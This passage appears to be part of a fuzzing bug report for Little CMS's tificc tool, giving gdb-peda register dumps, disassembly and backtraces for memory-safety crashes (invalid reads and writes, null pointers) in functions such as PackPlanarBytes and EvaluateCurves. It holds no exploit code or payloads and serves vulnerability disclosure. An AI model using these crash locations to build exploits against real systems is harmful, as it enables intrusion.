malloc.c:5006 470 | #4 _int_malloc (av=av@entry=0x7ffff76ceb20 , bytes=bytes@entry=0x40) at malloc.c:3474 471 | #5 0x00007ffff738e184 in __GI___libc_malloc (bytes=0x40) at malloc.c:2913 472 | #6 0x00007ffff7b73542 in _cmsMallocDefaultFn (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:97 473 | #7 0x00007ffff7b73921 in _cmsMalloc (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:267 474 | #8 0x00007ffff7b73564 in _cmsMallocZeroDefaultFn (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:106 475 | #9 0x00007ffff7b7395d in _cmsMallocZero (ContextID=0x4, size=0x40) at ../../cms/src/cmserr.c:274 476 | #10 0x00007ffff7b84f63 in _cmsStageAllocPlaceholder (ContextID=0x4, Type=cmsSigMatrixElemType, InputChannels=0x3, OutputChannels=0x3, EvalPtr=0x7ffff7b85896 , DupElemPtr=0x7ffff7b85995 , FreePtr=0x7ffff7b85a5d , Data=0x0) at ../../cms/src/cmslut.c:40 477 | #11 0x00007ffff7b85b9c in cmsStageAllocMatrix (ContextID=0x4, Rows=0x3, Cols=0x3, Matrix=0x7ffff7bbe400 , Offset=0x0) at ../../cms/src/cmslut.c:394 478 | #12 0x00007ffff7b87501 in _cmsStageAllocLabV2ToV4 (ContextID=0x4) at ../../cms/src/cmslut.c:1030 479 | #13 0x00007ffff7b75ecb in EvalSegmentedFn (g=0x60ee90, 
R=0) at ../../cms/src/cmsgamma.c:694 480 | #14 0x00007ffff7b78205 in cmsEvalToneCurveFloat (Curve=0x60ee90, v=0) at ../../cms/src/cmsgamma.c:1366 481 | #15 0x00007ffff7b85426 in EvaluateCurves (In=0x7fffffffde60, Out=0x7fffffffe060, mpe=0x60eae0) at ../../cms/src/cmslut.c:182 482 | #16 0x00007ffff7b87c5d in _LUTeval16 (In=0x1390, Out=0x7fffffffe2f0, D=0x0) at ../../cms/src/cmslut.c:1334 483 | #17 0x00007ffff7b97b5e in PrecalculatedXFORM (p=0x60e940, in=0x7ffff4e79010, out=0x60f050, PixelsPerLine=0x1e803d, LineCount=0x1, Stride=0x7fffffffe370) at ../../cms/src/cmsxform.c:411 484 | #18 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60e940, InputBuffer=0x7ffff4e79010, OutputBuffer=0x60f050, Size=0x1e803d) at ../../cms/src/cmsxform.c:189 485 | #19 0x0000000000402d73 in TileBasedXform (hXForm=0x60e940, in=0x609860, out=0x60a4d0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 486 | #20 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4d0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 487 | #21 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe608) at ../../../cms/utils/tificc/tificc.c:1167 488 | #22 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe608, init=, fini=, rtld_fini=, stack_end=0x7fffffffe5f8) at ../csu/libc-start.c:291 489 | #23 0x0000000000401fe9 in _start () 490 | 491 | ``` 492 | 493 | 494 | ## 10-cms-invalid-read-PackPlanarBytes 495 | 496 | 497 | ``` 498 | gdb --args tificc $POC /tmp/out.tiff 499 | Program received signal SIGSEGV, Segmentation fault. 500 | [----------------------------------registers-----------------------------------] 501 | RAX: 0x70c810 502 | RBX: 0x7ffff5959014 --> 0x0 503 | RCX: 0x100020 504 | RDX: 0x0 505 | RSI: 0x7fffffffe300 --> 0x0 506 | RDI: 0x60c2a0 --> 0x4101900441094 507 | RBP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 508 | RSP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 509 | RIP: 0x7ffff7b9003e (: mov BYTE PTR [rax],dl) 510 | R8 : 0x2ce 511 | R9 : 0x7fffffffe380 --> 0x0 512 | R10: 0x15b 513 | R11: 0x7ffff7b97389 (: push rbp) 514 | R12: 0x60c7f0 --> 0x7ffff76cf100 --> 0x7ffff76cf0e8 --> 0x7ffff76cf0d8 --> 0x7ffff76cf0c8 --> 0x7ffff76cf0b8 (--> ...) 515 | R13: 0x7fffffffe610 --> 0x3 516 | R14: 0x0 517 | R15: 0x0 518 | EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) 519 | [-------------------------------------code-------------------------------------] 520 | 0x7ffff7b90036 : not edx 521 | 0x7ffff7b90038 : jmp 0x7ffff7b9003e 522 | 0x7ffff7b9003a : movzx edx,BYTE PTR [rbp-0x21] 523 | => 0x7ffff7b9003e : mov BYTE PTR [rax],dl 524 | 0x7ffff7b90040 : mov edx,ecx 525 | 0x7ffff7b90042 : add rax,rdx 526 | 0x7ffff7b90045 : add DWORD PTR [rbp-0x20],0x1 527 | 0x7ffff7b90049 : mov edx,DWORD PTR [rbp-0x20] 528 | [------------------------------------stack-------------------------------------] 529 | 0000| 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 
530 | 0008| 0x7fffffffe298 --> 0x7ffff7b97b7f (: mov r12,rax) 531 | 0016| 0x7fffffffe2a0 --> 0x0 532 | 0024| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 533 | 0032| 0x7fffffffe2b0 --> 0x10002000000001 534 | 0040| 0x7fffffffe2b8 --> 0x60c7f0 --> 0x7ffff76cf100 --> 0x7ffff76cf0e8 --> 0x7ffff76cf0d8 --> 0x7ffff76cf0c8 (--> ...) 535 | 0048| 0x7fffffffe2c0 --> 0x7ffff5959010 --> 0x0 536 | 0056| 0x7fffffffe2c8 --> 0x60c2a0 --> 0x4101900441094 537 | [------------------------------------------------------------------------------] 538 | Legend: code, data, rodata, value 539 | Stopped reason: SIGSEGV 540 | 0x00007ffff7b9003e in PackPlanarBytes (info=0x60c2a0, wOut=0x7fffffffe300, output=0x70c810 , Stride=0x100020) at ../../cms/src/cmspack.c:1458 541 | 1458 *(cmsUInt8Number*) output = (cmsUInt8Number) (Reverse ? REVERSE_FLAVOR_8(v) : v); 542 | gdb-peda$ p output 543 | $1 = (cmsUInt8Number *) 0x70c810 544 | 545 | 546 | ``` 547 | 548 | 549 | 550 | ## 11-cms-invalid-write-cmsPipelineCheckAndRetreiveStages 551 | 552 | ``` 553 | gdb --args tificc $POC /tmp/out.tiff 554 | Program received signal SIGILL, Illegal instruction. 555 | [----------------------------------registers-----------------------------------] 556 | RAX: 0x7ffff7b85300 (: test DWORD PTR [rax],ebp) 557 | RBX: 0x7fffffffe300 --> 0xffff 558 | RCX: 0x7fffffffde70 --> 0x3f800000 559 | RDX: 0x60ea50 --> 0x0 560 | RSI: 0x7fffffffe070 --> 0x3f800000 561 | RDI: 0x7fffffffde70 --> 0x3f800000 562 | RBP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 
563 | RSP: 0x7fffffffde48 --> 0x7ffff7b87c5d (<_LUTeval16+197>: mov eax,DWORD PTR [rbp-0x434]) 564 | RIP: 0x7ffff7b85302 (: (bad)) 565 | R8 : 0x2ce 566 | R9 : 0x7fffffffe380 --> 0x0 567 | R10: 0x15b 568 | R11: 0x7ffff7b97389 (: push rbp) 569 | R12: 0x60cc49 --> 0x5afb53fb4bfb44fb 570 | R13: 0x7fffffffe610 --> 0x3 571 | R14: 0x0 572 | R15: 0x0 573 | EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) 574 | [-------------------------------------code-------------------------------------] 575 | => 0x7ffff7b85302 : (bad) 576 | 0x7ffff7b85303 : (bad) 577 | 0x7ffff7b85304 : dec DWORD PTR [rax-0x75] 578 | 0x7ffff7b85307 : xchg ebp,eax 579 | [------------------------------------stack-------------------------------------] 580 | 0000| 0x7fffffffde48 --> 0x7ffff7b87c5d (<_LUTeval16+197>: mov eax,DWORD PTR [rbp-0x434]) 581 | 0008| 0x7fffffffde50 --> 0x7ffff7b68410 --> 0x5f6e6f6d675f5f00 ('') 582 | 0016| 0x7fffffffde58 --> 0x100000000 583 | 0024| 0x7fffffffde60 --> 0x60ea50 --> 0x0 584 | 0032| 0x7fffffffde68 --> 0x609ee0 --> 0x60ea50 --> 0x0 585 | 0040| 0x7fffffffde70 --> 0x3f800000 586 | 0048| 0x7fffffffde78 --> 0x7fff00000000 587 | 0056| 0x7fffffffde80 --> 0x7fffffffdf14 --> 0x609c9800000000 588 | [------------------------------------------------------------------------------] 589 | Legend: code, data, rodata, value 590 | Stopped reason: SIGILL 591 | 0x00007ffff7b85302 in cmsPipelineCheckAndRetreiveStages (Lut=0x608088, n=0x0) at ../../cms/src/cmslut.c:143 592 | 143 *ElemPtr = mpe; 593 | gdb-peda$ bt 594 | #0 0x00007ffff7b85302 in cmsPipelineCheckAndRetreiveStages (Lut=0x608088, n=0x0) at ../../cms/src/cmslut.c:143 595 | #1 0x00007ffff7b97b5e in PrecalculatedXFORM (p=0x60c2a0, in=0x626580, out=0x60c7f0, PixelsPerLine=0x1e20, LineCount=0x1, Stride=0x7fffffffe380) at ../../cms/src/cmsxform.c:411 596 | #2 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c2a0, InputBuffer=0x626580, OutputBuffer=0x60c7f0, Size=0x1e20) at ../../cms/src/cmsxform.c:189 
597 | #3 0x0000000000402d73 in TileBasedXform (hXForm=0x60c2a0, in=0x609860, out=0x60a480, nPlanes=0x3) at ../../../cms/utils/tificc/tificc.c:408 598 | #4 0x00000000004044db in TransformImage (in=0x609860, out=0x60a480, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 599 | #5 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 600 | #6 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 601 | #7 0x0000000000401fe9 in _start () 602 | gdb-peda$ p ElemPtr 603 | $1 = (void **) 0xc0dfff9fe2b9c1c6 604 | gdb-peda$ p *ElemPtr 605 | Cannot access memory at address 0xc0dfff9fe2b9c1c6 606 | 607 | ``` 608 | 609 | ## 12-cms-invalid-access-EvaluateCurves 610 | 611 | ``` 612 | gdb --args tificc $POC /tmp/out.tiff 613 | Program received signal SIGSEGV, Segmentation fault. 614 | [----------------------------------registers-----------------------------------] 615 | RAX: 0xd54f63cff6bf3700 616 | RBX: 0x7fffffffe320 --> 0xffffffff 617 | RCX: 0x7fffffffde90 --> 0x3f8000003f800000 618 | RDX: 0x8b48108b 619 | RSI: 0x7fffffffe090 --> 0x3f8000003f800000 620 | RDI: 0x7fffffffde90 --> 0x3f8000003f800000 621 | RBP: 0x7fffffffe2b0 --> 0x7fffffffe360 --> 0x7fffffffe3c0 --> 0x7fffffffe430 --> 0x7fffffffe520 --> 0x7fffffffe550 (--> ...) 622 | RSP: 0x7fffffffde68 --> 0x7ffff7b87c5d (<_LUTeval16+197>: mov eax,DWORD PTR [rbp-0x434]) 623 | RIP: 0x7ffff7b85405 (: mov rax,QWORD PTR [rax+0x8]) 624 | R8 : 0x2ce 625 | R9 : 0x7fffffffe3a0 --> 0x0 626 | R10: 0x15b 627 | R11: 0x7ffff7b97389 (: push rbp) 628 | R12: 0x60ccc9 --> 0x97fd90fd89fd82fd 629 | R13: 0x7fffffffe630 --> 0x3 630 | R14: 0x0 631 | R15: 0x0 632 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 633 | [-------------------------------------code-------------------------------------] 634 | 0x7ffff7b853fc : add rax,rdx 635 | 0x7ffff7b853ff : mov edx,DWORD PTR [rax] 636 | 0x7ffff7b85401 : mov rax,QWORD PTR [rbp-0x18] 637 | => 0x7ffff7b85405 : mov rax,QWORD PTR [rax+0x8] 638 | 0x7ffff7b85409 : mov ecx,DWORD PTR [rbp-0x1c] 639 | 0x7ffff7b8540c : shl rcx,0x3 640 | 0x7ffff7b85410 : add rax,rcx 641 | 0x7ffff7b85413 : mov rax,QWORD PTR [rax] 642 | [------------------------------------stack-------------------------------------] 643 | 0000| 0x7fffffffde68 --> 0x7ffff7b87c5d (<_LUTeval16+197>: 
mov eax,DWORD PTR [rbp-0x434]) 644 | 0008| 0x7fffffffde70 --> 0x7ffff7b68410 --> 0x5f6e6f6d675f5f00 ('') 645 | 0016| 0x7fffffffde78 --> 0x100000000 646 | 0024| 0x7fffffffde80 --> 0x60ea30 ("&.6>K[k{\227\267\326\367", '\377' , "S\270\367\377\177") 647 | 0032| 0x7fffffffde88 --> 0x609ec0 --> 0x60ea30 ("&.6>K[k{\227\267\326\367", '\377' , "S\270\367\377\177") 648 | 0040| 0x7fffffffde90 --> 0x3f8000003f800000 649 | 0048| 0x7fffffffde98 --> 0x7fff00000000 650 | 0056| 0x7fffffffdea0 --> 0x7fffffffdf34 --> 0x609c9800000000 651 | [------------------------------------------------------------------------------] 652 | Legend: code, data, rodata, value 653 | Stopped reason: SIGSEGV 654 | 0x00007ffff7b85405 in EvaluateCurves (In=0x40efffe000000000, Out=0x100000001, mpe=0x1) at ../../cms/src/cmslut.c:182 655 | 182 Out[i] = cmsEvalToneCurveFloat(Data ->TheCurves[i], In[i]); 656 | gdb-peda$ p Out 657 | $1 = (cmsFloat32Number *) 0x100000001 658 | gdb-peda$ p Out[i] 659 | Cannot access memory at address 0x100000001 660 | 661 | 662 | ``` 663 | 664 | ## 13-cms-null-pointer-FastIdentity16 665 | 666 | ``` 667 | 668 | gdb --args tificc $POC /tmp/out.tiff 669 | Program received signal SIGSEGV, Segmentation fault. 670 | [----------------------------------registers-----------------------------------] 671 | RAX: 0x0 672 | RBX: 0x7ffff7fc9a98 --> 0x0 673 | RCX: 0x7fffffffe2e0 --> 0x0 674 | RDX: 0x0 675 | RSI: 0x7fffffffe300 --> 0x0 676 | RDI: 0x7fffffffe2e0 --> 0x0 677 | RBP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 678 | RSP: 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 
679 | RIP: 0x7ffff7bbaa37 (: mov eax,DWORD PTR [rax+0x8]) 680 | R8 : 0x7fffffffe2e0 --> 0x0 681 | R9 : 0x7fffffffe380 --> 0x0 682 | R10: 0x15b 683 | R11: 0x7ffff7b97389 (: push rbp) 684 | R12: 0x615ca3 --> 0x50f849f842f83af8 685 | R13: 0x7fffffffe610 --> 0x3 686 | R14: 0x0 687 | R15: 0x0 688 | EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) 689 | [-------------------------------------code-------------------------------------] 690 | 0x7ffff7bbaa2c : mov WORD PTR [rdx],ax 691 | 0x7ffff7bbaa2f : add DWORD PTR [rbp-0xc],0x1 692 | 0x7ffff7bbaa33 : mov rax,QWORD PTR [rbp-0x8] 693 | => 0x7ffff7bbaa37 : mov eax,DWORD PTR [rax+0x8] 694 | 0x7ffff7bbaa3a : cmp eax,DWORD PTR [rbp-0xc] 695 | 0x7ffff7bbaa3d : ja 0x7ffff7bbaa16 696 | 0x7ffff7bbaa3f : nop 697 | 0x7ffff7bbaa40 : pop rbp 698 | [------------------------------------stack-------------------------------------] 699 | 0000| 0x7fffffffe290 --> 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 (--> ...) 
700 | 0008| 0x7fffffffe298 --> 0x7ffff7b97b5e (: mov rax,QWORD PTR [rbp-0x78]) 701 | 0016| 0x7fffffffe2a0 --> 0x0 702 | 0024| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 703 | 0032| 0x7fffffffe2b0 --> 0x832000000001 704 | 0040| 0x7fffffffe2b8 --> 0x60df60 --> 0x0 705 | 0048| 0x7fffffffe2c0 --> 0x7ffff7fba010 --> 0x0 706 | 0056| 0x7fffffffe2c8 --> 0x60c2a0 --> 0x4101900041092 707 | [------------------------------------------------------------------------------] 708 | Legend: code, data, rodata, value 709 | Stopped reason: SIGSEGV 710 | 0x00007ffff7bbaa37 in FastIdentity16 (In=0x7fffffffe2e0, Out=0x7fffffffe300, D=0x0) at ../../cms/src/cmsopt.c:1371 711 | 1371 for (i=0; i < Lut ->InputChannels; i++) 712 | gdb-peda$ bt 713 | #0 0x00007ffff7bbaa37 in FastIdentity16 (In=0x7fffffffe2e0, Out=0x7fffffffe300, D=0x0) at ../../cms/src/cmsopt.c:1371 714 | #1 0x00007ffff7b97b5e in PrecalculatedXFORM (p=0x60c2a0, in=0x7ffff7fba010, out=0x60df60, PixelsPerLine=0x8320, LineCount=0x1, Stride=0x7fffffffe380) at ../../cms/src/cmsxform.c:411 715 | #2 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60c2a0, InputBuffer=0x7ffff7fba010, OutputBuffer=0x60df60, Size=0x8320) at ../../cms/src/cmsxform.c:189 716 | #3 0x0000000000402d73 in TileBasedXform (hXForm=0x60c2a0, in=0x609860, out=0x60a480, nPlanes=0x3) at ../../../cms/utils/tificc/tificc.c:408 717 | #4 0x00000000004044db in TransformImage (in=0x609860, out=0x60a480, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 718 | #5 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 719 | #6 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 720 | #7 0x0000000000401fe9 in _start () 721 | gdb-peda$ p Lut 722 | $1 = (cmsPipeline *) 0x0 723 | 724 | 725 | ``` 726 | 727 | 728 | 729 | ## 14-cms-invalid-access-Unroll1ByteReversed 730 | 731 | ``` 732 | 733 | gdb --args tificc $POC /tmp/out.tiff 734 | Program received signal SIGSEGV, Segmentation fault. 735 | [----------------------------------registers-----------------------------------] 736 | RAX: 0x7ffff7b8e600 (: mov r8d,edi) 737 | RBX: 0x6166ee --> 0x882588158805168e 738 | RCX: 0x1810 739 | RDX: 0x168e 740 | RSI: 0x168e 741 | RDI: 0xff9f168e 742 | RBP: 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 --> 0x405ad0 (<__libc_csu_init>: push r15) 743 | RSP: 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 744 | RIP: 0x7ffff7b8e61b (: mov WORD PTR [rcx],dx) 745 | R8 : 0x60e930 --> 0x87870087870087 746 | R9 : 0x7fffffffe380 --> 0x0 747 | R10: 0x15b 748 | R11: 0x7ffff7b97389 (: push rbp) 749 | R12: 0x60e941 --> 0xee00007ffff7b8e6 750 | R13: 0x7fffffffe610 --> 0x3 751 | R14: 0x0 752 | R15: 0x0 753 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 754 | [-------------------------------------code-------------------------------------] 755 | 0x7ffff7b8e612 : movzx esi,WORD PTR [rsi] 756 | 0x7ffff7b8e615 : mov WORD PTR [rdx],si 757 | 0x7ffff7b8e618 : movzx edx,WORD PTR [rdx] 758 | => 0x7ffff7b8e61b : mov WORD PTR [rcx],dx 759 | 0x7ffff7b8e61e : add rax,0x1 760 | 0x7ffff7b8e622 : pop rbp 761 | 0x7ffff7b8e623 : ret 762 | 0x7ffff7b8e624 : push rbp 763 | [------------------------------------stack-------------------------------------] 764 | 0000| 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 765 | 0008| 0x7fffffffe2a0 --> 0x0 766 | 0016| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 767 | 0024| 0x7fffffffe2b0 --> 0x181000000001 768 | 0032| 0x7fffffffe2b8 --> 0x60ade0 --> 0x7f00f20000f6f2 
769 | 0040| 0x7fffffffe2c0 --> 0x60f040 --> 0x7ffff76cf2e8 --> 0x7ffff76cf2d8 --> 0x7ffff76cf2c8 --> 0x7ffff76cf2b8 (--> ...) 770 | 0048| 0x7fffffffe2c8 --> 0x60e930 --> 0x87870087870087 771 | 0056| 0x7fffffffe2d0 --> 0x13cb00000000 772 | [------------------------------------------------------------------------------] 773 | Legend: code, data, rodata, value 774 | Stopped reason: SIGSEGV 775 | 0x00007ffff7b8e61b in Unroll1ByteReversed (info=0xff9f168e, wIn=0x1810, accum=0x7ffff7b8e600 "A\211\370\017\266\070@\017\266\377D\t\307\367\327f\211>\017\267\066f\211\062\017\267\022f\211\021H\203\300\001]\303UH\211\345ATSH\203\354\060H\211\370I\211\364H\211\323\213\020\301\352\003\203\342\017\211U\320\213\020\301\352\v\203\342\001\211U\324\213\020\301\352\n\203\342\001\211U\330\213\020\301\352\r\203\342\001\211U\334\213\020\301\352\016\203\342\001\211U\340\213", Stride=0x1810) at ../../cms/src/cmspack.c:462 776 | 462 wIn[0] = wIn[1] = wIn[2] = REVERSE_FLAVOR_16(FROM_8_TO_16(*accum)); accum++; // L *) 777 | gdb-peda$ bt 778 | #0 0x00007ffff7b8e61b in Unroll1ByteReversed (info=0xff9f168e, wIn=0x1810, accum=0x7ffff7b8e600 "A\211\370\017\266\070@\017\266\377D\t\307\367\327f\211>\017\267\066f\211\062\017\267\022f\211\021H\203\300\001]\303UH\211\345ATSH\203\354\060H\211\370I\211\364H\211\323\213\020\301\352\003\203\342\017\211U\320\213\020\301\352\v\203\342\001\211U\324\213\020\301\352\n\203\342\001\211U\330\213\020\301\352\r\203\342\001\211U\334\213\020\301\352\016\203\342\001\211U\340\213", Stride=0x1810) at ../../cms/src/cmspack.c:462 779 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60e930, InputBuffer=0x60f040, OutputBuffer=0x60ade0, Size=0x1810) at ../../cms/src/cmsxform.c:189 780 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60e930, in=0x609860, out=0x60a4c0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 781 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4c0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 782 | #4 
0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 783 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 784 | #6 0x0000000000401fe9 in _start () 785 | gdb-peda$ p wIn[0] 786 | Cannot access memory at address 0x1810 787 | 788 | ``` 789 | 790 | 791 | ## 15-cms-null-pointer-UnrollAnyWords 792 | 793 | ``` 794 | gdb --args tificc $POC /tmp/out.tiff 795 | Program received signal SIGSEGV, Segmentation fault. 796 | [----------------------------------registers-----------------------------------] 797 | RAX: 0x7ffff7b8e6c3 (: or BYTE PTR [rbx+0x148ec45],cl) 798 | RBX: 0x62577e --> 0xc45cc452c448c43e 799 | RCX: 0x2e10 800 | RDX: 0x62577e --> 0xc45cc452c448c43e 801 | RSI: 0x7fffffffe2e0 --> 0xc402c3f8c3eec3e4 802 | RDI: 0x60e930 --> 0xc2c2c2c2c2c200c2 803 | RBP: 0x7fffffffe340 --> 0x7fffffffe3a0 --> 0x7fffffffe410 --> 0x7fffffffe500 --> 0x7fffffffe530 --> 0x405ad0 (<__libc_csu_init>: push r15) 804 | RSP: 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 805 | RIP: 0x7ffff7b8e6c3 (: or BYTE PTR [rbx+0x148ec45],cl) 806 | R8 : 0x1 807 | R9 : 0x7fffffffe380 --> 0x0 808 | R10: 0x15b 809 | R11: 0x7ffff7b97389 (: push rbp) 810 | R12: 0x60e941 --> 0xee00007ffff7b8e6 811 | R13: 0x7fffffffe610 --> 0x3 812 | R14: 0x0 813 | R15: 0x0 814 | EFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow) 815 | [-------------------------------------code-------------------------------------] 816 | => 0x7ffff7b8e6c3 : or BYTE PTR [rbx+0x148ec45],cl 817 | 0x7ffff7b8e6c9 : ror BYTE PTR [rcx-0x73],0x14 818 | 0x7ffff7b8e6cd : add al,0x83 819 | 0x7ffff7b8e6cf : jge 0x7ffff7b8e6ad 820 | [------------------------------------stack-------------------------------------] 821 | 0000| 0x7fffffffe298 --> 0x7ffff7b97b36 (: mov rbx,rax) 822 | 0008| 0x7fffffffe2a0 --> 0x0 823 | 0016| 0x7fffffffe2a8 --> 0x7fffffffe380 --> 0x0 824 | 0024| 0x7fffffffe2b0 --> 0x2e1000000001 825 | 0032| 0x7fffffffe2b8 --> 0x60ade0 --> 0xeb000000e7 826 | 0040| 0x7fffffffe2c0 --> 0x61e080 --> 0x60e7f0 --> 
0xb500b5b500b5b500 827 | 0048| 0x7fffffffe2c8 --> 0x60e930 --> 0xc2c2c2c2c2c200c2 828 | 0056| 0x7fffffffe2d0 --> 0x13cb00000000 829 | [------------------------------------------------------------------------------] 830 | Legend: code, data, rodata, value 831 | Stopped reason: SIGSEGV 832 | 0x00007ffff7b8e6c3 in UnrollAnyWords (info=0x7ffff7b8e6c3 , wIn=0x60e941, accum=0x62577e ">\304H\304R\304\\\304e\304o\304y\304\203\304\215\304\227\304\241\304\253\304\265\304\277\304\311\304\323\304\335\304\347\304\361\304\373\304\005\305\017\305\031\305#\305,\305\066\305@\305J\305T\305^\305h\305r\305|\305\206\305\220\305\231\305\243\305\255\305\267\305\301\305\313\305\325\305\337\305\351\305\362\305\374\305\006\306\020\306\032\306$\306.\306\067\306A\306K\306U\306_\306i\306s\306|\306\206\306\220\306\232\306\244\306\256\306\267\306\301\306\313\306\325\306\337\306\350\306\362\306\374\306\006\307\020\307\031\307#\307-\307\067\307A\307J\307T\307^\307h\307r\307{\307\205\307\217\307\231\307\242\307\254\307\266\307\300\307\311\307\323\307\335\307\347\307\360\307\372\307\004\310\016\310"..., Stride=0x2e10) at ../../cms/src/cmspack.c:496 833 | 496 v = CHANGE_ENDIAN(v); 834 | gdb-peda$ bt 835 | #0 0x00007ffff7b8e6c3 in UnrollAnyWords (info=0x7ffff7b8e6c3 , wIn=0x60e941, accum=0x62577e ">\304H\304R\304\\\304e\304o\304y\304\203\304\215\304\227\304\241\304\253\304\265\304\277\304\311\304\323\304\335\304\347\304\361\304\373\304\005\305\017\305\031\305#\305,\305\066\305@\305J\305T\305^\305h\305r\305|\305\206\305\220\305\231\305\243\305\255\305\267\305\301\305\313\305\325\305\337\305\351\305\362\305\374\305\006\306\020\306\032\306$\306.\306\067\306A\306K\306U\306_\306i\306s\306|\306\206\306\220\306\232\306\244\306\256\306\267\306\301\306\313\306\325\306\337\306\350\306\362\306\374\306\006\307\020\307\031\307#\307-\307\067\307A\307J\307T\307^\307h\307r\307{\307\205\307\217\307\231\307\242\307\254\307\266\307\300\307\311\307\323\307\335\307\347\307\360\307\372\307\004\310\016\310"..., 
Stride=0x2e10) at ../../cms/src/cmspack.c:496 836 | #1 0x00007ffff7b973f7 in cmsDoTransform (Transform=0x60e930, InputBuffer=0x61e080, OutputBuffer=0x60ade0, Size=0x2e10) at ../../cms/src/cmsxform.c:189 837 | #2 0x0000000000402d73 in TileBasedXform (hXForm=0x60e930, in=0x609860, out=0x60a4c0, nPlanes=0x1) at ../../../cms/utils/tificc/tificc.c:408 838 | #3 0x00000000004044db in TransformImage (in=0x609860, out=0x60a4c0, cDefInpProf=0x0) at ../../../cms/utils/tificc/tificc.c:904 839 | #4 0x0000000000404d86 in main (argc=0x3, argv=0x7fffffffe618) at ../../../cms/utils/tificc/tificc.c:1167 840 | #5 0x00007ffff732a830 in __libc_start_main (main=0x404c38
, argc=0x3, argv=0x7fffffffe618, init=, fini=, rtld_fini=, stack_end=0x7fffffffe608) at ../csu/libc-start.c:291 841 | #6 0x0000000000401fe9 in _start () 842 | gdb-peda$ p v 843 | $1 = 0x0 844 | 845 | 846 | ``` 847 | 848 | 849 | 850 | 851 | --------------------------------------------------------------------------------